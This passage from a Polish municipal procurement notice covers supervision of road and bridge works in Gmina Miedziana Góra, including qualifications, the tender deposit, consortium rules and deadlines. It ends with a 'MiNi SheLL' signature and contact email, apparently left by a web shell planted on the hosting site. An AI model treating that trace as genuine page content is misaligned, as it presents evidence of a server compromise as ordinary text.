drogowej,<br/>- posiada doświadczenie w nadzorowaniu lub kierowaniu robotami (jako kierownik budowy lub kierownik robót) w zakresie specjalności inżynieryjnej drogowej na minimum 1 inwestycji polegającej na budowie lub przebudowie lub rozbudowie drogi/dróg, o wartości nie mniejszej niż 250 000,00 zł brutto w okresie ostatnich 5 lat przed upływem terminu składania ofert<br/>i<br/>vi.	co najmniej jedną osobę, która będzie pełnić funkcję inspektora nadzoru w specjalności inżynieryjnej mostowej, osoba ta posiadać będzie:<br/>- uprawnienia budowlane do kierowania budowami w specjalności inżynieryjnej mostowej,<br/>- posiada doświadczenie w nadzorowaniu lub kierowaniu robotami (jako kierownik budowy lub kierownik robót) w zakresie specjalności inżynieryjnej mostowej na minimum 1 inwestycji polegającej na budowie lub przebudowie lub rozbudowie mostu lub obiektu mostowego, o wartości nie mniejszej niż 250 000,00 zł brutto w okresie ostatnich 5 lat przed upływem terminu składania ofert.<br/>UWAGA: Za drogę Zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz.U z 2021 poz. 1376).<br/><br/>Do wykazu osób należy dołączyć oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- warunek określony w Rozdziale VI ust. 3 pkt b) ppkt iv) musi być spełniony w całości min przez jednego z Wykonawców,<br/>- warunek określony w Rozdziale VI ust. 3 pkt b) ppkt v) i vi) Wykonawcy mogą spełniać łącznie.<br/>Zgodnie z art. 12a Prawa budowlanego który to odsyła do ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020 r. poz. 220) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależność do izby samorządu zawodowego.<br/>4.	Sytuacji ekonomicznej i finansowej:<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych w zakresie:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada:<br/>a)	Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia nie mniejszej niż 250 000,00 zł<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek powyżej musi spełniać jeden z Wykonawców samodzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga przedstawienia podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia, jednakże z zastrzeżeniem zapisu w rozdziale VIII pkt 7, Zamawiający zażąda od Wykonawcy oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>2. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>3. oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.<br/>4. dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia nie mniejszej niż 250 000,00 zł.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty, która wypełniana jest przez Wykonawcę na formularzu do oferty, załącznik nr 1 do SWZ, Wykonawca zobowiązany jest dołączyć załącznik nr 1a do formularza oferty oraz aktualne na dzień składania ofert oświadczenia o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikami do SWZ.<br/>2. Do oferty załącza się zobowiązanie innego podmiotu, o którym mowa w Rozdziale IX ust. 1 pkt. 3 wraz z oświadczeniami podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu (jeżeli dotyczy).<br/>3. Do oferty załącza się dowód wniesienia wadium (w przypadku wadium złożonego w formie poręczeń lub gwarancji).<br/>4. Do oferty załącza się dokumenty, z których wynika prawo do podpisania oferty (np.: odpis z KRS, CEIDG) lub wskazanie w formularzu ofertowym danych umożliwiających dostęp do tych dokumentów, aby Zamawiający mógł uzyskać je za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących działania publiczne.<br/>5. Do oferty załącza się odpowiednie pełnomocnictwa (jeżeli dotyczy)<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości :<br/>3 600,00 zł (słownie: trzy tysiące sześćset zł 00/00)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach”<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w BS Kielce oddział M/Góra nr rachunku 75 8493 0004 0020 0303 0078 0006 z dopiskiem &#34;Wadium – IGPOS.271.5.2022.”<br/>Uwaga: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp, bez potwierdzania tych okoliczności;<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Gmina Miedziana Góra;<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>8)	musi zostać przekazane w oryginale, w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji.<br/>6.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona.<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych, w tym:<br/>1)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie <br/>z art. 58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania <br/>w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie <br/>w ofercie dokumentu zawierającego pełnomocnictwo w celu umożliwienia identyfikacji.<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki zakres rzeczowy zamówienia (które roboty budowlane) realizować zamierzają poszczególni Wykonawcy.<br/>3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w rozdziale V SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu.<br/>4)	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2.	W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby:<br/>- warunek określony w Rozdziale VI ust. 3 pkt a) ppkt i) musi być spełniony w całości min przez jednego z Wykonawców,<br/>- warunek określony w Rozdziale VI ust. 3 pkt a) ppkt ii) i iii) Wykonawcy mogą spełniać łącznie,<br/>- warunek określony w Rozdziale VI ust. 3 pkt b) ppkt iv) musi być spełniony w całości min przez jednego z Wykonawców,<br/>- warunek określony w Rozdziale VI ust. 3 pkt b) ppkt v) i vi) Wykonawcy mogą spełniać łącznie,<br/>- warunek określony w Rozdziale VI ust. 4 pkt a) musi spełniać jeden z Wykonawców samodzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami SWZ i wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miedziana-gora.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-22 09:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Ostateczny termin realizacji całego przedmiotu umowy (zamówienia):<br/>a) udział w ewentualnych negocjacjach prowadzonych w terminie przewidzianym przez Zamawiającego, tj. do 30 sierpnia 2022 r., na etapie prowadzonego postępowania o udzielenie zamówienia publicznego celem wyboru Wykonawców robót budowlanych związanych z inwestycją,<br/>b) od dnia przekazania placu budowy przez 14 miesięcy, i wymaganym okresie rękojmi który wynosi 60 m-cy od daty zakończenia świadczenia usługi nadzoru (pobyty na żądanie Zamawiającego podczas okresowych przeglądów oraz sytuacjach w których wymagany będzie do ustalenia zakres zgłaszanych wad i usterek Wykonawcy), z tym zastrzeżeniem, że wydłużenie terminu zakończenia robót budowlanych dla inwestycji skutkuje przedłużeniem okresu świadczenia usług w zakresie nadzoru inwestorskiego do dnia, w którym nastąpi faktyczne zakończenie robót budowlanych przez wykonawcę robót.<br/>2. W zatwierdzonym SWZ, Zamawiający, w rozdziale dot. wadium, podał, iż w tytule przelewu Wykonawca winien podać nr postępowania: IGPOS.271.5.2021 - OCZYWIŚCIE, jest to omyłka pisarska, i należy podać nr postępowania IGPOS.271.5.2022, tak jak zostało to zapisane w niniejszym ogłoszeniu o zamówieniu w sekcji dot. wadium.<br/>3. Pozostałe informacje, które nie zostały uwzględnione w niniejszym ogłoszeniu, Zamawiający zawarł w SWZ i załącznikach do SWZ. Wykonawca zobowiązany jest do zapoznania się z ich treścią.

Creat By MiNi SheLL
Email: jattceo@gmail.com